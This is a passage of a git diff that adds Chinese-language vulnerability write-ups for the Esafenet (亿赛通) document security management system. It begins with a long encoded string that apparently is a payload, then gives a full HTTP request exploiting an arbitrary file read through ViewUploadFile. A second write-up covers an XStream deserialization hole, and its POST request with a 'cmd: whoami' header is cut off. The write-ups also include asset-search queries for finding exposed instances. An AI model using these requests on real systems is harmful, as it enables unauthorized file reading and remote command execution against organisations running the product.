ODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK
+```
+
+![1706606214283-97d9a1a2-6678-48b5-ac38-65b3e7ec3b66.png](./img/SycXQUY9DRCNi_Jk/1706606214283-97d9a1a2-6678-48b5-ac38-65b3e7ec3b66-057449.png)
+
+
+
+> 更新: 2024-04-20 22:01:32  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/aaqgrkdlxyaxoaih>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统ViewUploadFile存在任意文件读取漏洞.md b/亿赛通电子文档安全管理系统ViewUploadFile存在任意文件读取漏洞.md
new file mode 100644
index 0000000..136bbe0
--- /dev/null
+++ b/亿赛通电子文档安全管理系统ViewUploadFile存在任意文件读取漏洞.md
@@ -0,0 +1,33 @@
+# 亿赛通电子文档安全管理系统ViewUploadFile存在任意文件读取漏洞
+
+# 一、漏洞简介
+亿赛通电子文档安全管理系统是一款电子文档安全加密软件，该系统利用驱动层透明加密技术，通过对电子文档的加密保护，防止内部员工泄密和外部人员非法窃取企业核心重要数据资产，对电子文档进行全生命周期防护，系统具有透明加密、主动加密、智能加密等多种加密方式，用户可根据部门涉密程度的不同（如核心部门和普通门），部署力度轻重不一的梯度式文档加密防护，实现技术、管理、审计进行有机的结合，在内部构建起立体化的整体信息防泄露体系，使得成本、效率和安全三者达到平衡，实现电子文档的数据安全。亿赛通电子文档安全管理系统ViewUploadFile存在任意文件读取漏洞。
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/a1zbrpLQwGdJvau1/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-585164.png)
+
+# 四、漏洞复现
+```plain
+GET /CDGServer3/client/;login;/DecryptApplication?command=ViewUploadFile&filePath=C:/Windows/System32/drivers/etc/hosts&uploadFileId=1&fileName1=hosts HTTP/1.1
+Host: 
+Cache-Control: max-age=0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: JSESSIONID=5BEE0014C9CD691F3177A3194EB06C3F
+Upgrade-Insecure-Requests: 1
+Accept-Encoding: gzip, deflate
+```
+
+![1705077242906-5bdd6d32-1859-451d-b680-246f8b50ac84.png](./img/a1zbrpLQwGdJvau1/1705077242906-5bdd6d32-1859-451d-b680-246f8b50ac84-884585.png)
+
+
+
+> 更新: 2024-04-20 22:01:30  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kgt5w16dogqflv5q>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统clientMessage存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统clientMessage存在xstream反序列化漏洞.md
new file mode 100644
index 0000000..4b2c59d
--- /dev/null
+++ b/亿赛通电子文档安全管理系统clientMessage存在xstream反序列化漏洞.md
@@ -0,0 +1,36 @@
+# 亿赛通电子文档安全管理系统clientMessage存在xstream 反序列化漏洞
+
+# 一、漏洞简介
+  亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品，保护范围涵盖终端电脑（Windows、Mac、Linux系统平台）、智能终端（Android、IOS）及各类应用系统（OA、知识管理、文档管理、项目管理、PDM等）。亿赛通电子文档安全管理系统clientMessage存在xstream 反序列化漏洞
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/gYpaKKfdS_r9zElE/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-337685.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/clientMessage HTTP/1.1
+Accept: */*
+User-Agent: Mozilla/5.0
+Connection: close
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8
+Content-Type: text/xml
+Host: 192.168.110.187:8090
+cmd: whoami
+Content-Length: 14756
+
